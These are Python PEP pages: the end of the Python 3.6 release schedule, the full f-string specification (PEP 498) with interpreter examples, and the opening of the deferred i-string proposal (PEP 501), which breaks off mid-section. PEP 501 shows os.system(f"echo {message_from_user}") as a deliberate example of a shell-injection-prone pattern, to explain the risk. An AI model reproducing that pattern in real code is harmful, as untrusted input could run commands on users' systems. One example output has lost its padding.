3.7.0 final, a final 3.6 bugfix update will be released.
After that, it is expected that
security updates
(source only) will be released as needed until 5 years after
the release of 3.6 final, so until approximately 2021-12.
As of 2021-12-23, 3.6 has reached the
end-of-life phase
of its release cycle. 3.6.15 was the final security release. The code base for
3.6 is now frozen and no further updates will be provided, nor will issues of
any kind be accepted on the bug tracker.
Release Schedule
3.6.0 schedule
3.6 development begins: 2015-05-24
3.6.0 alpha 1: 2016-05-17
3.6.0 alpha 2: 2016-06-13
3.6.0 alpha 3: 2016-07-11
3.6.0 alpha 4: 2016-08-15
3.6.0 beta 1: 2016-09-12
(No new features beyond this point.)
3.6.0 beta 2: 2016-10-10
3.6.0 beta 3: 2016-10-31
3.6.0 beta 4: 2016-11-21
3.6.0 candidate 1: 2016-12-06
3.6.0 candidate 2: 2016-12-16
3.6.0 final: 2016-12-23
3.6.1 schedule (first bugfix release)
3.6.1 candidate: 2017-03-05
3.6.1 final: 2017-03-21
3.6.2 schedule
3.6.2 candidate 1: 2017-06-17
3.6.2 candidate 2: 2017-07-07
3.6.2 final: 2017-07-17
3.6.3 schedule
3.6.3 candidate: 2017-09-19
3.6.3 final: 2017-10-03
3.6.4 schedule
3.6.4 candidate: 2017-12-05
3.6.4 final: 2017-12-19
3.6.5 schedule
3.6.5 candidate: 2018-03-13
3.6.5 final: 2018-03-28
3.6.6 schedule
3.6.6 candidate: 2018-06-12
3.6.6 final: 2018-06-27
3.6.7 schedule
3.6.7 candidate: 2018-09-26
3.6.7 candidate 2: 2018-10-13
3.6.7 final: 2018-10-20
3.6.8 schedule (last bugfix release)
Last binary releases
3.6.8 candidate: 2018-12-11
3.6.8 final: 2018-12-24
3.6.9 schedule (first security-only release)
Source only
3.6.9 candidate 1: 2019-06-18
3.6.9 final: 2019-07-02
3.6.10 schedule
3.6.10 candidate 1: 2019-12-11
3.6.10 final: 2019-12-18
3.6.11 schedule
3.6.11 candidate 1: 2020-06-15
3.6.11 final: 2020-06-27
3.6.12 schedule
3.6.12 final: 2020-08-17
3.6.13 schedule
3.6.13 final: 2021-02-15
3.6.14 schedule
3.6.14 final: 2021-06-28
3.6.15 schedule (last security-only release)
3.6.15 final: 2021-09-04
Features for 3.6
Implemented changes for 3.6 (as of 3.6.0 beta 1):
PEP 468, Preserving Keyword Argument Order
PEP 487, Simpler customization of class creation
PEP 495, Local Time Disambiguation
PEP 498, Literal String Formatting
PEP 506, Adding A Secrets Module To The Standard Library
PEP 509, Add a private version to dict
PEP 515, Underscores in Numeric Literals
PEP 519, Adding a file system path protocol
PEP 520, Preserving Class Attribute Definition Order
PEP 523, Adding a frame evaluation API to CPython
PEP 524, Make os.urandom() blocking on Linux (during system startup)
PEP 525, Asynchronous Generators (provisional)
PEP 526, Syntax for Variable Annotations (provisional)
PEP 528, Change Windows console encoding to UTF-8 (provisional)
PEP 529, Change Windows filesystem encoding to UTF-8 (provisional)
PEP 530, Asynchronous Comprehensions
Copyright
This document has been placed in the public domain.
| Final | PEP 494 – Python 3.6 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.6. The schedule primarily concerns itself with PEP-sized
items. |
PEP 498 – Literal String Interpolation
Author:
Eric V. Smith <eric at trueblade.com>
Status:
Final
Type:
Standards Track
Created:
01-Aug-2015
Python-Version:
3.6
Post-History:
07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
No use of globals() or locals()
Specification
Escape sequences
Code equivalence
Expression evaluation
Format specifiers
Concatenating strings
Error handling
Leading and trailing whitespace in expressions is ignored
Evaluation order of expressions
Discussion
python-ideas discussion
How to denote f-strings
How to specify the location of expressions in f-strings
Supporting full Python expressions
Similar support in other languages
Differences between f-string and str.format expressions
Triple-quoted f-strings
Raw f-strings
No binary f-strings
!s, !r, and !a are redundant
Lambdas inside expressions
Can’t combine with ‘u’
Examples from Python’s source code
References
Copyright
Abstract
Python supports multiple ways to format text strings. These include
%-formatting [1], str.format() [2], and string.Template
[3]. Each of these methods has its advantages, but also has
disadvantages that make it cumbersome to use in practice. This
PEP proposes to add a new string formatting mechanism: Literal String
Interpolation. In this PEP, such strings will be referred to as
“f-strings”, taken from the leading character used to denote such
strings, and standing for “formatted strings”.
This PEP does not propose to remove or deprecate any of the existing
string formatting mechanisms.
F-strings provide a way to embed expressions inside string literals,
using a minimal syntax. It should be noted that an f-string is really
an expression evaluated at run time, not a constant value. In Python
source code, an f-string is a literal string, prefixed with ‘f’, which
contains expressions inside braces. The expressions are replaced with
their values. Some examples are:
>>> import datetime
>>> name = 'Fred'
>>> age = 50
>>> anniversary = datetime.date(1991, 10, 12)
>>> f'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.'
'My name is Fred, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
>>> f'He said his name is {name!r}.'
"He said his name is 'Fred'."
A similar feature was proposed in PEP 215. PEP 215 proposed to support
a subset of Python expressions, and did not support the type-specific
string formatting (the __format__() method) which was introduced
with PEP 3101.
Rationale
This PEP is driven by the desire to have a simpler way to format
strings in Python. The existing ways of formatting are either error
prone, inflexible, or cumbersome.
%-formatting is limited as to the types it supports. Only ints, strs,
and doubles can be formatted. All other types are either not
supported, or converted to one of these types before formatting. In
addition, there’s a well-known trap where a single value is passed:
>>> msg = 'disk failure'
>>> 'error: %s' % msg
'error: disk failure'
But if msg were ever to be a tuple, the same code would fail:
>>> msg = ('disk failure', 32)
>>> 'error: %s' % msg
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: not all arguments converted during string formatting
To be defensive, the following code should be used:
>>> 'error: %s' % (msg,)
"error: ('disk failure', 32)"
str.format() was added to address some of these problems with
%-formatting. In particular, it uses normal function call syntax (and
therefore supports multiple parameters) and it is extensible through
the __format__() method on the object being converted to a
string. See PEP 3101 for a detailed rationale. This PEP reuses much of
the str.format() syntax and machinery, in order to provide
continuity with an existing Python string formatting mechanism.
However, str.format() is not without its issues. Chief among them
is its verbosity. For example, the text value is repeated here:
>>> value = 4 * 20
>>> 'The value is {value}.'.format(value=value)
'The value is 80.'
Even in its simplest form there is a bit of boilerplate, and the value
that’s inserted into the placeholder is sometimes far removed from
where the placeholder is situated:
>>> 'The value is {}.'.format(value)
'The value is 80.'
With an f-string, this becomes:
>>> f'The value is {value}.'
'The value is 80.'
F-strings provide a concise, readable way to include the value of
Python expressions inside strings.
In this sense, string.Template and %-formatting have similar
shortcomings to str.format(), but also support fewer formatting
options. In particular, they do not support the __format__
protocol, so that there is no way to control how a specific object is
converted to a string, nor can it be extended to additional types that
want to control how they are converted to strings (such as Decimal
and datetime). This example is not possible with
string.Template:
>>> value = 1234
>>> f'input={value:#06x}'
'input=0x04d2'
And neither %-formatting nor string.Template can control
formatting such as:
>>> date = datetime.date(1991, 10, 12)
>>> f'{date} was on a {date:%A}'
'1991-10-12 was on a Saturday'
No use of globals() or locals()
In the discussions on python-dev [4], a number of solutions were
presented that used locals() and globals() or their equivalents. All
of these have various problems. Among these are referencing variables
that are not otherwise used in a closure. Consider:
>>> def outer(x):
...     def inner():
...         return 'x={x}'.format_map(locals())
...     return inner
...
>>> outer(42)()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 3, in inner
KeyError: 'x'
This returns an error because the compiler has not added a reference
to x inside the closure. You need to manually add a reference to x in
order for this to work:
>>> def outer(x):
...     def inner():
...         x
...         return 'x={x}'.format_map(locals())
...     return inner
...
>>> outer(42)()
'x=42'
In addition, using locals() or globals() introduces an information
leak. A called routine that has access to the caller’s locals() or
globals() has access to far more information than needed to do the
string interpolation.
Guido stated [5] that any solution to better string interpolation
would not use locals() or globals() in its implementation. (This does
not forbid users from passing locals() or globals() in, it just
doesn’t require it, nor does it allow using these functions under the
hood.)
Specification
In source code, f-strings are string literals that are prefixed by the
letter ‘f’ or ‘F’. Everywhere this PEP uses ‘f’, ‘F’ may also be
used. ‘f’ may be combined with ‘r’ or ‘R’, in either order, to produce
raw f-string literals. ‘f’ may not be combined with ‘b’: this PEP does
not propose to add binary f-strings. ‘f’ may not be combined with ‘u’.
When tokenizing source files, f-strings use the same rules as normal
strings, raw strings, binary strings, and triple quoted strings. That
is, the string must end with the same character that it started with:
if it starts with a single quote it must end with a single quote, etc.
This implies that any code that currently scans Python code looking
for strings should be trivially modifiable to recognize f-strings
(parsing within an f-string is another matter, of course).
Once tokenized, f-strings are parsed into literal strings and
expressions. Expressions appear within curly braces '{' and
'}'. While scanning the string for expressions, any doubled
braces '{{' or '}}' inside literal portions of an f-string are
replaced by the corresponding single brace. Doubled literal opening
braces do not signify the start of an expression. A single closing
curly brace '}' in the literal portion of a string is an error:
literal closing curly braces must be doubled '}}' in order to
represent a single closing brace.
The parts of the f-string outside of braces are literal
strings. These literal portions are then decoded. For non-raw
f-strings, this includes converting backslash escapes such as
'\n', '\"', "\'", '\xhh', '\uxxxx',
'\Uxxxxxxxx', and named unicode characters '\N{name}' into
their associated Unicode characters [6].
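For example (an illustration, not taken from the PEP), escape sequences in
the literal portions are processed just as in any other string literal:
>>> f'\N{BULLET} total: {2 + 2}\n'
'• total: 4\n'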
Backslashes may not appear anywhere within expressions. Comments,
using the '#' character, are not allowed inside an expression.
Following each expression, an optional type conversion may be
specified. The allowed conversions are '!s', '!r', or
'!a'. These are treated the same as in str.format(): '!s'
calls str() on the expression, '!r' calls repr() on the
expression, and '!a' calls ascii() on the expression. These
conversions are applied before the call to format(). The only
reason to use '!s' is if you want to specify a format specifier
that applies to str, not to the type of the expression.
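As an illustration (not from the PEP), when a conversion is given the format
specifier applies to the converted string rather than to the original value:
>>> import decimal
>>> value = decimal.Decimal('12.34567')
>>> f'{value:.4}'      # the specifier is handled by Decimal.__format__
'12.35'
>>> f'{value!s:>12}'   # str(value) first, then the string is formatted
'    12.34567'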
F-strings use the same format specifier mini-language as str.format.
Similar to str.format(), optional format specifiers may be
included inside the f-string, separated from the expression (or the
type conversion, if specified) by a colon. If a format specifier is
not provided, an empty string is used.
So, an f-string looks like:
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
The expression is then formatted using the __format__ protocol,
using the format specifier as an argument. The resulting value is
used when building the value of the f-string.
Note that __format__() is not called directly on each value. The
actual code uses the equivalent of type(value).__format__(value,
format_spec), or format(value, format_spec). See the
documentation of the builtin format() function for more details.
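A minimal illustration (not from the PEP) of the protocol: an object’s
__format__ method receives whatever specifier was written in the f-string:
>>> class Celsius:
...     def __init__(self, degrees):
...         self.degrees = degrees
...     def __format__(self, spec):
...         return format(self.degrees, spec or '.1f') + ' C'
...
>>> temp = Celsius(21.456)
>>> f'temperature: {temp}'
'temperature: 21.5 C'
>>> f'temperature: {temp:08.2f}'
'temperature: 00021.46 C'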
Expressions cannot contain ':' or '!' outside of strings or
parentheses, brackets, or braces. The exception is that the '!='
operator is allowed as a special case.
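For example (illustrative only), a colon inside a string literal or inside
parentheses, and the '!=' operator, are all accepted:
>>> x = 3
>>> f'{x != 4}'
'True'
>>> f'{"a:b".split(":")}'
"['a', 'b']"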
Escape sequences
Backslashes may not appear inside the expression portions of
f-strings, so you cannot use them, for example, to escape quotes
inside f-strings:
>>> f'{\'quoted string\'}'
File "<stdin>", line 1
SyntaxError: f-string expression part cannot include a backslash
You can use a different type of quote inside the expression:
>>> f'{"quoted string"}'
'quoted string'
Backslash escapes may appear inside the string portions of an
f-string.
Note that the correct way to have a literal brace appear in the
resulting string value is to double the brace:
>>> f'{{ {4*10} }}'
'{ 40 }'
>>> f'{{{4*10}}}'
'{40}'
Like all raw strings in Python, no escape processing is done for raw
f-strings:
>>> fr'x={4*10}\n'
'x=40\\n'
Due to Python’s string tokenizing rules, the f-string
f'abc {a['x']} def' is invalid. The tokenizer parses this as 3
tokens: f'abc {a[', x, and ']} def'. Just like regular
strings, this cannot be fixed by using raw strings. There are a number
of correct ways to write this f-string: with a different quote
character:
f"abc {a['x']} def"
Or with triple quotes:
f'''abc {a['x']} def'''
Code equivalence
The exact code used to implement f-strings is not specified. However,
it is guaranteed that any embedded value that is converted to a string
will use that value’s __format__ method. This is the same
mechanism that str.format() uses to convert values to strings.
For example, this code:
f'abc{expr1:spec1}{expr2!r:spec2}def{expr3}ghi'
Might be evaluated as:
'abc' + format(expr1, spec1) + format(repr(expr2), spec2) + 'def' + format(expr3) + 'ghi'
Expression evaluation
The expressions that are extracted from the string are evaluated in
the context where the f-string appeared. This means the expression has
full access to local and global variables. Any valid Python expression
can be used, including function and method calls.
Because the f-strings are evaluated where the string appears in the
source code, there is no additional expressiveness available with
f-strings. There are also no additional security concerns: you could
have also just written the same expression, not inside of an
f-string:
>>> def foo():
...     return 20
...
>>> f'result={foo()}'
'result=20'
Is equivalent to:
>>> 'result=' + str(foo())
'result=20'
Expressions are parsed with the equivalent of ast.parse('(' +
expression + ')', '<fstring>', 'eval') [7].
Note that since the expression is enclosed by implicit parentheses
before evaluation, expressions can contain newlines. For example:
>>> x = 0
>>> f'''{x
... +1}'''
'1'
>>> d = {0: 'zero'}
>>> f'''{d[0
... ]}'''
'zero'
Format specifiers
Format specifiers may also contain evaluated expressions. This allows
code such as:
>>> width = 10
>>> precision = 4
>>> value = decimal.Decimal('12.34567')
>>> f'result: {value:{width}.{precision}}'
'result: 12.35'
Once expressions in a format specifier are evaluated (if necessary),
format specifiers are not interpreted by the f-string evaluator. Just
as in str.format(), they are merely passed in to the
__format__() method of the object being formatted.
Concatenating strings
Adjacent f-strings and regular strings are concatenated. Regular
strings are concatenated at compile time, and f-strings are
concatenated at run time. For example, the expression:
>>> x = 10
>>> y = 'hi'
>>> 'a' 'b' f'{x}' '{c}' f'str<{y:^4}>' 'd' 'e'
yields the value:
'ab10{c}str< hi >de'
While the exact method of this run time concatenation is unspecified,
the above code might evaluate to:
'ab' + format(x) + '{c}' + 'str<' + format(y, '^4') + '>de'
Each f-string is entirely evaluated before being concatenated to
adjacent f-strings. That means that this:
>>> f'{x' f'}'
Is a syntax error, because the first f-string does not contain a
closing brace.
Error handling
Either compile time or run time errors can occur when processing
f-strings. Compile time errors are limited to those errors that can be
detected when scanning an f-string. These errors all raise
SyntaxError.
Unmatched braces:
>>> f'x={x'
File "<stdin>", line 1
SyntaxError: f-string: expecting '}'
Invalid expressions:
>>> f'x={!x}'
File "<stdin>", line 1
SyntaxError: f-string: empty expression not allowed
Run time errors occur when evaluating the expressions inside an
f-string. Note that an f-string can be evaluated multiple times, and
work sometimes and raise an error at other times:
>>> d = {0:10, 1:20}
>>> for i in range(3):
...     print(f'{i}:{d[i]}')
...
0:10
1:20
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
KeyError: 2
or:
>>> for x in (32, 100, 'fifty'):
...     print(f'x = {x:+3}')
...
x = +32
x = +100
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
ValueError: Sign not allowed in string format specifier
Leading and trailing whitespace in expressions is ignored
For ease of readability, leading and trailing whitespace in
expressions is ignored. This is a by-product of enclosing the
expression in parentheses before evaluation.
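For example (not from the PEP):
>>> x = 42
>>> f'{ x }' == f'{x}'
True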
Evaluation order of expressions
The expressions in an f-string are evaluated in left-to-right
order. This is detectable only if the expressions have side effects:
>>> def fn(l, incr):
...     result = l[0]
...     l[0] += incr
...     return result
...
>>> lst = [0]
>>> f'{fn(lst,2)} {fn(lst,3)}'
'0 2'
>>> f'{fn(lst,2)} {fn(lst,3)}'
'5 7'
>>> lst
[10]
Discussion
python-ideas discussion
Most of the discussions on python-ideas [8] focused on three issues:
How to denote f-strings,
How to specify the location of expressions in f-strings, and
Whether to allow full Python expressions.
How to denote f-strings
Because the compiler must be involved in evaluating the expressions
contained in the interpolated strings, there must be some way to
denote to the compiler which strings should be evaluated. This PEP
chose a leading 'f' character preceding the string literal. This
is similar to how 'b' and 'r' prefixes change the meaning of
the string itself, at compile time. Other prefixes were suggested,
such as 'i'. No option seemed better than the other, so 'f'
was chosen.
Another option was to support special functions, known to the
compiler, such as Format(). This seems like too much magic for
Python: not only is there a chance for collision with existing
identifiers, the PEP author feels that it’s better to signify the
magic with a string prefix character.
How to specify the location of expressions in f-strings
This PEP supports the same syntax as str.format() for
distinguishing replacement text inside strings: expressions are
contained inside braces. There were other options suggested, such as
string.Template’s $identifier or ${expression}.
While $identifier is no doubt more familiar to shell scripters and
users of some other languages, in Python str.format() is heavily
used. A quick search of Python’s standard library shows only a handful
of uses of string.Template, but hundreds of uses of
str.format().
Another proposed alternative was to have the substituted text between
\{ and } or between \{ and \}. While this syntax would
probably be desirable if all string literals were to support
interpolation, this PEP only supports strings that are already marked
with the leading 'f'. As such, the PEP is using unadorned braces
to denote substituted text, in order to leverage end user familiarity
with str.format().
Supporting full Python expressions
Many people on the python-ideas discussion wanted support for either
only single identifiers, or a limited subset of Python expressions
(such as the subset supported by str.format()). This PEP supports
full Python expressions inside the braces. Without full expressions,
some desirable usage would be cumbersome. For example:
>>> f'Column={col_idx+1}'
>>> f'number of items: {len(items)}'
would become:
>>> col_number = col_idx+1
>>> f'Column={col_number}'
>>> n_items = len(items)
>>> f'number of items: {n_items}'
While it’s true that very ugly expressions could be included in the
f-strings, this PEP takes the position that such uses should be
addressed in a linter or code review:
>>> f'mapping is { {a:b for (a, b) in ((1, 2), (3, 4))} }'
'mapping is {1: 2, 3: 4}'
Similar support in other languages
Wikipedia has a good discussion of string interpolation in other
programming languages [9]. This feature is implemented in many
languages, with a variety of syntaxes and restrictions.
Differences between f-string and str.format expressions
There is one small difference between the limited expressions allowed
in str.format() and the full expressions allowed inside
f-strings. The difference is in how index lookups are performed. In
str.format(), index values that do not look like numbers are
converted to strings:
>>> d = {'a': 10, 'b': 20}
>>> 'a={d[a]}'.format(d=d)
'a=10'
Notice that the index value is converted to the string 'a' when it
is looked up in the dict.
However, in f-strings, you would need to use a literal for the value
of 'a':
>>> f'a={d["a"]}'
'a=10'
This difference is required because otherwise you would not be able to
use variables as index values:
>>> a = 'b'
>>> f'a={d[a]}'
'a=20'
See [10] for a further discussion. It was this observation that led to
full Python expressions being supported in f-strings.
Furthermore, the limited expressions that str.format() understands
need not be valid Python expressions. For example:
>>> '{i[";]}'.format(i={'";':4})
'4'
For this reason, the str.format() “expression parser” is not suitable
for use when implementing f-strings.
Triple-quoted f-strings
Triple quoted f-strings are allowed. These strings are parsed just as
normal triple-quoted strings are. After parsing and decoding, the
normal f-string logic is applied, and __format__() is called on
each value.
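For example (an illustration, not from the PEP), a triple-quoted f-string
can span multiple lines:
>>> name = 'Fred'
>>> f'''He said his
... name is {name}.'''
'He said his\nname is Fred.'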
Raw f-strings
Raw and f-strings may be combined. For example, they could be used to
build up regular expressions:
>>> header = 'Subject'
>>> fr'{header}:\s+'
'Subject:\\s+'
In addition, raw f-strings may be combined with triple-quoted strings.
No binary f-strings
For the same reason that we don’t support bytes.format(), you may
not combine 'f' with 'b' string literals. The primary problem
is that an object’s __format__() method may return Unicode data that
is not compatible with a bytes string.
Binary f-strings would first require a solution for
bytes.format(). This idea has been proposed in the past, most
recently in PEP 461. The discussions of such a feature usually
suggest either
adding a method such as __bformat__() so an object can control
how it is converted to bytes, or
having bytes.format() not be as general purpose or extensible
as str.format().
Both of these remain as options in the future, if such functionality
is desired.
!s, !r, and !a are redundant
The !s, !r, and !a conversions are not strictly
required. Because arbitrary expressions are allowed inside the
f-strings, this code:
>>> a = 'some string'
>>> f'{a!r}'
"'some string'"
Is identical to:
>>> f'{repr(a)}'
"'some string'"
Similarly, !s can be replaced by calls to str() and !a by
calls to ascii().
However, !s, !r, and !a are supported by this PEP in order
to minimize the differences with str.format(). !s, !r, and
!a are required in str.format() because it does not allow the
execution of arbitrary expressions.
Lambdas inside expressions
Because lambdas use the ':' character, they cannot appear outside
of parentheses in an expression. The colon is interpreted as the start
of the format specifier, which means the start of the lambda
expression is seen and is syntactically invalid. As there’s no
practical use for a plain lambda in an f-string expression, this is
not seen as much of a limitation.
If you feel you must use lambdas, they may be used inside of parentheses:
>>> f'{(lambda x: x*2)(3)}'
'6'
Can’t combine with ‘u’
The ‘u’ prefix was added to Python 3.3 in PEP 414 as a means to ease
source compatibility with Python 2.7. Because Python 2.7 will never
support f-strings, there is nothing to be gained by being able to
combine the ‘f’ prefix with ‘u’.
Examples from Python’s source code
Here are some examples from Python source code that currently use
str.format(), and how they would look with f-strings. This PEP
does not recommend wholesale converting to f-strings; these are just
examples of real-world usages of str.format() and how they’d look
if written from scratch using f-strings.
Lib/asyncio/locks.py:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
extra = f'{extra},waiters:{len(self._waiters)}'
Lib/configparser.py:
message.append(" [line {0:2d}]".format(lineno))
message.append(f" [line {lineno:2d}]")
Tools/clinic/clinic.py:
methoddef_name = "{}_METHODDEF".format(c_basename.upper())
methoddef_name = f"{c_basename.upper()}_METHODDEF"
python-config.py:
print("Usage: {0} [{1}]".format(sys.argv[0], '|'.join('--'+opt for opt in valid_opts)), file=sys.stderr)
print(f"Usage: {sys.argv[0]} [{'|'.join('--'+opt for opt in valid_opts)}]", file=sys.stderr)
References
[1]
%-formatting
(https://docs.python.org/3/library/stdtypes.html#printf-style-string-formatting)
[2]
str.format
(https://docs.python.org/3/library/string.html#formatstrings)
[3]
string.Template documentation
(https://docs.python.org/3/library/string.html#template-strings)
[4]
Formatting using locals() and globals()
(https://mail.python.org/pipermail/python-ideas/2015-July/034671.html)
[5]
Avoid locals() and globals()
(https://mail.python.org/pipermail/python-ideas/2015-July/034701.html)
[6]
String literal description
(https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals)
[7]
ast.parse() documentation
(https://docs.python.org/3/library/ast.html#ast.parse)
[8]
Start of python-ideas discussion
(https://mail.python.org/pipermail/python-ideas/2015-July/034657.html)
[9]
Wikipedia article on string interpolation
(https://en.wikipedia.org/wiki/String_interpolation)
[10]
Differences in str.format() and f-string expressions
(https://mail.python.org/pipermail/python-ideas/2015-July/034726.html)
Copyright
This document has been placed in the public domain.
| Final | PEP 498 – Literal String Interpolation | Standards Track | Python supports multiple ways to format text strings. These include
%-formatting [1], str.format() [2], and string.Template
[3]. Each of these methods have their advantages, but in addition
have disadvantages that make them cumbersome to use in practice. This
PEP proposed to add a new string formatting mechanism: Literal String
Interpolation. In this PEP, such strings will be referred to as
“f-strings”, taken from the leading character used to denote such
strings, and standing for “formatted strings”. |
PEP 501 – General purpose string interpolation
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Deferred
Type:
Standards Track
Requires:
498
Created:
08-Aug-2015
Python-Version:
3.6
Post-History:
08-Aug-2015, 23-Aug-2015, 30-Aug-2015
Table of Contents
Abstract
PEP Deferral
Summary of differences from PEP 498
Proposal
Rationale
Specification
Conversion specifiers
Writing custom renderers
Expression evaluation
Handling code injection attacks
Format specifiers
Error handling
Possible integration with the logging module
Discussion
Deferring support for binary interpolation
Interoperability with str-only interfaces
Preserving the raw template string
Creating a rich object rather than a global name lookup
Building atop PEP 498, rather than competing with it
Deferring consideration of possible use in i18n use cases
Acknowledgements
References
Copyright
Abstract
PEP 498 proposes new syntactic support for string interpolation that is
transparent to the compiler, allowing name references from the interpolation
operation full access to containing namespaces (as with any other expression),
rather than being limited to explicit name references. These are referred
to in the PEP as “f-strings” (a mnemonic for “formatted strings”).
However, it only offers this capability for string formatting, making it likely
we will see code like the following:
os.system(f"echo {message_from_user}")
This kind of code is superficially elegant, but poses a significant problem
if the interpolated value message_from_user is in fact provided by an
untrusted user: it’s an opening for a form of code injection attack, where
the supplied user data has not been properly escaped before being passed to
the os.system call.
To address that problem (and a number of other concerns), this PEP proposes
the complementary introduction of “i-strings” (a mnemonic for “interpolation
template strings”), where f"Message with {data}" would produce the same
result as format(i"Message with {data}").
Some possible examples of the proposed syntax:
mycommand = sh(i"cat {filename}")
myquery = sql(i"SELECT {column} FROM {table};")
myresponse = html(i"<html><body>{response.body}</body></html>")
logging.debug(i"Message with {detailed} {debugging} {info}")
PEP Deferral
This PEP is currently deferred pending further experience with PEP 498’s
simpler approach of only supporting eager rendering without the additional
complexity of also supporting deferred rendering.
Summary of differences from PEP 498
The key additions this proposal makes relative to PEP 498:
the “i” (interpolation template) prefix indicates delayed rendering, but
otherwise uses the same syntax and semantics as formatted strings
interpolation templates are available at runtime as a new kind of object
(types.InterpolationTemplate)
the default rendering used by formatted strings is invoked on an
interpolation template object by calling format(template) rather than
implicitly
while f-string f"Message {here}" would be semantically equivalent to
format(i"Message {here}"), it is expected that the explicit syntax would
avoid the runtime overhead of using the delayed rendering machinery
NOTE: This proposal spells out a draft API for types.InterpolationTemplate.
The precise details of the structures and methods exposed by this type would
be informed by the reference implementation of PEP 498, so it makes sense to
gain experience with that as an internal API before locking down a public API
(if this extension proposal is accepted).
Proposal
This PEP proposes the introduction of a new string prefix that declares the
string to be an interpolation template rather than an ordinary string:
template = i"Substitute {names} and {expressions()} at runtime"
This would be effectively interpreted as:
_raw_template = "Substitute {names} and {expressions()} at runtime"
_parsed_template = (
("Substitute ", "names"),
(" and ", "expressions()"),
(" at runtime", None),
)
_field_values = (names, expressions())
_format_specifiers = (f"", f"")
template = types.InterpolationTemplate(_raw_template,
_parsed_template,
_field_values,
_format_specifiers)
The __format__ method on types.InterpolationTemplate would then
implement the following str.format inspired semantics:
>>> import datetime
>>> name = 'Jane'
>>> age = 50
>>> anniversary = datetime.date(1991, 10, 12)
>>> format(i'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.')
'My name is Jane, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
>>> format(i'She said her name is {repr(name)}.')
"She said her name is 'Jane'."
As with formatted strings, the interpolation template prefix can be combined with single-quoted, double-quoted and triple quoted strings, including raw strings.
It does not support combination with bytes literals.
Similarly, this PEP does not propose to remove or deprecate any of the existing
string formatting mechanisms, as those will remain valuable when formatting
strings that are not present directly in the source code of the application.
Rationale
PEP 498 makes interpolating values into strings with full access to Python’s
lexical namespace semantics simpler, but it does so at the cost of creating a
situation where interpolating values into sensitive targets like SQL queries,
shell commands and HTML templates will enjoy a much cleaner syntax when handled
without regard for code injection attacks than when they are handled correctly.
This PEP proposes to provide the option of delaying the actual rendering
of an interpolation template to its __format__ method, allowing the use of
other template renderers by passing the template around as a first class object.
While very different in the technical details, the
types.InterpolationTemplate interface proposed in this PEP is
conceptually quite similar to the FormattableString type underlying the
native interpolation support introduced in C# 6.0.
Specification
This PEP proposes the introduction of i as a new string prefix that
results in the creation of an instance of a new type,
types.InterpolationTemplate.
Interpolation template literals are Unicode strings (bytes literals are not
permitted), and string literal concatenation operates as normal, with the
entire combined literal forming the interpolation template.
The template string is parsed into literals, expressions and format specifiers
as described for f-strings in PEP 498. Conversion specifiers are handled
by the compiler, and appear as part of the field text in interpolation
templates.
However, rather than being rendered directly into a formatted strings, these
components are instead organised into an instance of a new type with the
following semantics:
class InterpolationTemplate:
    __slots__ = ("raw_template", "parsed_template",
                 "field_values", "format_specifiers")
    def __new__(cls, raw_template, parsed_template,
                field_values, format_specifiers):
        self = super().__new__(cls)
        self.raw_template = raw_template
        self.parsed_template = parsed_template
        self.field_values = field_values
        self.format_specifiers = format_specifiers
        return self
    def __repr__(self):
        return (f"<{type(self).__qualname__} {repr(self.raw_template)} "
                f"at {id(self):#x}>")
    def __format__(self, format_specifier):
        # When formatted, render to a string, and use string formatting
        return format(self.render(), format_specifier)
    def render(self, *, render_template=''.join,
               render_field=format):
        # See definition of the template rendering semantics below
The result of an interpolation template expression is an instance of this
type, rather than an already rendered string - rendering only takes
place when the instance’s render method is called (either directly, or
indirectly via __format__).
The compiler will pass the following details to the interpolation template for
later use:
a string containing the raw template as written in the source code
a parsed template tuple that allows the renderer to render the
template without needing to reparse the raw string template for substitution
fields
a tuple containing the evaluated field values, in field substitution order
a tuple containing the field format specifiers, in field substitution order
This structure is designed to take full advantage of compile time constant
folding by ensuring the parsed template is always constant, even when the
field values and format specifiers include variable substitution expressions.
The raw template is just the interpolation template as a string. By default,
it is used to provide a human readable representation for the interpolation
template.
The parsed template consists of a tuple of 2-tuples, with each 2-tuple
containing the following fields:
leading_text: a leading string literal. This will be the empty string if
the current field is at the start of the string, or immediately follows the
preceding field.
field_expr: the text of the expression element in the substitution field.
This will be None for a final trailing text segment.
The tuple of evaluated field values holds the results of evaluating the
substitution expressions in the scope where the interpolation template appears.
The tuple of field specifiers holds the results of evaluating the field
specifiers as f-strings in the scope where the interpolation template appears.
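As a hypothetical illustration of the proposed structure (the
InterpolationTemplate type does not exist, so the values shown here are only
an assumption consistent with the description above), a template such as
i"Hello {name}, you have {count:>3} messages" would carry roughly:
name, count = 'Jane', 7
raw_template = 'Hello {name}, you have {count:>3} messages'
parsed_template = (
    ('Hello ', 'name'),
    (', you have ', 'count'),
    (' messages', None),
)
field_values = (name, count)        # ('Jane', 7), evaluated in the enclosing scope
format_specifiers = ('', '>3')      # each specifier is itself rendered as an f-string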
The InterpolationTemplate.render implementation then defines the rendering
process in terms of the following renderers:
an overall render_template operation that defines how the sequence of
literal template sections and rendered fields are composed into a fully
rendered result. The default template renderer is string concatenation
using ''.join.
a per field render_field operation that receives the field value and
format specifier for substitution fields within the template. The default
field renderer is the format builtin.
Given an appropriate parsed template representation and internal methods of
iterating over it, the semantics of template rendering would then be equivalent
to the following:
def render(self, *, render_template=''.join,
           render_field=format):
    iter_fields = enumerate(self.parsed_template)
    values = self.field_values
    specifiers = self.format_specifiers
    template_parts = []
    for field_pos, (leading_text, field_expr) in iter_fields:
        template_parts.append(leading_text)
        if field_expr is not None:
            value = values[field_pos]
            specifier = specifiers[field_pos]
            rendered_field = render_field(value, specifier)
            template_parts.append(rendered_field)
    return render_template(template_parts)
Conversion specifiers
NOTE:
